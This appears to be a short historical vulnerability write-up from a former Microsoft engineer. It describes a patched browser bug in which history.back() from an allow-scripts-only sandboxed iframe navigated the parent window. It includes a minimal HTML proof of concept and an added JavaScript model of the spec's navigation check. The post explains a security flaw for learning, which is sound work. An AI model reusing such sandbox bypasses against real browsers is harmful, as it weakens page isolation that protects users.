A sandboxed iframe with only allow-scripts is not supposed to be able to change its parent’s URL. But any of the history navigation methods — history.back(), history.forward(), history.go() — could be called from inside the sandboxed frame and would navigate the parent window, bypassing that restriction entirely.
<!-- index.html: setup page that adds a history entry before navigating to main.html -->
<a href="main.html">Click me to go to a site with a SandBoxed iFrame</a>
<!-- main.html: page hosting the sandboxed iframe -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>
<!-- sandboxed.html -->
<input type="button" value="history.back()" onclick="history.back()" />
Clicking the button inside the sandboxed frame navigated the parent window back in history — something it was not supposed to be able to do. The parent needed at least one prior history entry for the bypass to work, but in normal browsing that condition is almost always met.
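To make the missing check concrete, here is an added example (not code from the original post or from any browser) that models the HTML spec's "allowed to navigate" rule for sandboxed browsing contexts and shows that session-history traversal has to go through the same gate as a location change; the class names, flag names and the two-entry history are simplifying assumptions.

```javascript
// Added model of sandboxed navigation (simplified; not browser code).
// A browsing context carries sandbox flags: "navigation" is set whenever the
// sandbox attribute is present, "top-navigation" is cleared by allow-top-navigation.
class BrowsingContext {
  constructor(name, parent = null, sandboxFlags = new Set()) {
    this.name = name;
    this.parent = parent;
    this.sandboxFlags = sandboxFlags;
  }
  get top() { let c = this; while (c.parent) c = c.parent; return c; }
  isAncestorOf(other) {
    for (let c = other.parent; c; c = c.parent) if (c === this) return true;
    return false;
  }
}

// Simplified form of the spec's "source is allowed to navigate target":
// a sandboxed context may navigate itself and its descendants, and the
// top-level context only when allow-top-navigation was granted.
function allowedToNavigate(source, target) {
  if (source === target || source.isAncestorOf(target)) return true;
  if (!source.sandboxFlags.has("navigation")) return true;
  if (target === source.top && !source.sandboxFlags.has("top-navigation")) return true;
  return false;
}

// Joint session history for the top-level context: index.html -> main.html.
// traverse() is what history.back()/forward()/go() reduce to; `enforceSandbox`
// false reproduces the historical bug where traversal skipped the check.
class SessionHistory {
  constructor(top) { this.top = top; this.entries = ["index.html", "main.html"]; this.index = 1; }
  traverse(source, delta, enforceSandbox = true) {
    if (enforceSandbox && !allowedToNavigate(source, this.top)) {
      return { navigated: false, current: this.entries[this.index] };
    }
    this.index = Math.min(Math.max(this.index + delta, 0), this.entries.length - 1);
    return { navigated: true, current: this.entries[this.index] };
  }
}

// Constructed scenario: main.html hosts a frame sandboxed with allow-scripts only.
const mainPage = new BrowsingContext("main.html");
const scriptsOnlyFrame = new BrowsingContext("sandboxed.html", mainPage,
  new Set(["navigation", "top-navigation"]));
const topNavFrame = new BrowsingContext("sandboxed.html", mainPage, new Set(["navigation"]));
```

With the check enforced, `history.back()` from the allow-scripts frame is refused and main.html stays current; without it, the frame walks the top-level history back to index.html.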
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.